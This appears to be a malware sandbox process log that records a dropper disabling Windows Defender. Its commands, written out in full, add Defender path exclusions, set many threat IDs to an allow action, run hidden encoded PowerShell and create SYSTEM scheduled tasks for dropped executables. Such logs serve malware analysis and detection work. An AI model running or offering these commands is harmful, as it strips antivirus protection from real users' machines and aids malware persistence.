  [2] PID 464  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
    [3] PID 3144  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      [4] PID 5220  C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    [3] PID 3940  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    [3] PID 3784  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    [3] PID 820  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    [3] PID 5144  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    [3] PID 5340  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    [3] PID 1028  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    [3] PID 4628  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    [3] PID 5540  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    [3] PID 5080  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    [3] PID 6128  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    [3] PID 5136  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    [3] PID 4340  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    [3] PID 3124  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    [3] PID 4684  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    [3] PID 1248  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    [3] PID 5200  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    [3] PID 5796  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    [3] PID 5172  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    [3] PID 4568  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
  [2] PID 5476  C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gflsSnYKZ" /SC once /ST 03:08:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
  [2] PID 5944  C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gflsSnYKZ"
    [3] PID 6120  C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] PID 5584  C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gflsSnYKZ"
  [2] PID 2624  C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:26:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\PywzyBK.exe\" GH /vbYLdidcG 385118 /S" /V1 /F
    - Creates scheduled task(s)
  [2] PID 5616  C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "XyyyteIMwZeutaZuw"
[1] PID 5520  C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe | C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe it /gzCdidTIuK 385118 /S
  [2] PID 5616  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    [3] PID 4144  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      [4] PID 5136  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        [5] PID 3512  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
    [3] PID 5292  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      [4] PID 5404  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        [5] PID 4688  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
    [3] PID 2444  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      [4] PID 2292  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        [5] PID 5436  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
    [3] PID 5504  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      [4] PID 3184  C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        [5] PID 696  \??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
    [3] PID 1972  C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      [4] PID 1500  C:\Windows\SysWOW64\cmd.exe | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        [5] PID 6120  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell start-process -WindowStyle Hidden gpupdate.exe /force
          - Command and Scripting Interpreter: PowerShell
          [6] PID 2036  C:\Windows\SysWOW64\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force
  [2] PID 4676  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
    [3] PID 3452  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      [4] PID 6008  C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    [3] PID 3164  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    [3] PID 4604  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    [3] PID 5128  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    [3] PID 5376  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    [3] PID 1500  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    [3] PID 1344  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    [3] PID 5700  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    [3] PID 1256  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    [3] PID 5780  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    [3] PID 5372  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    [3] PID 5284  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    [3] PID 1108  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    [3] PID 2248  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    [3] PID 6136  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    [3] PID 244  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    [3] PID 940  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    [3] PID 5932  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    [3] PID 4884  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    [3] PID 2424  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    [3] PID 1160  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    [3] PID 696  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    [3] PID 4908  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    [3] PID 1388  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    [3] PID 5644  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    [3] PID 1888  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    [3] PID 1856  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    [3] PID 3508  C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
  [2] PID 5672  C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:23:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FHAVoFv.exe\" GH /BJPYdidQd 385118 /S" /V1 /F
    - Creates scheduled task(s)
  [2] PID 5564  C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "XyyyteIMwZeutaZuw"
[1] PID 2272  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
[1] PID 1432  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe | C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
[1] PID 3940  C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe | C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
[1] PID 3696  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
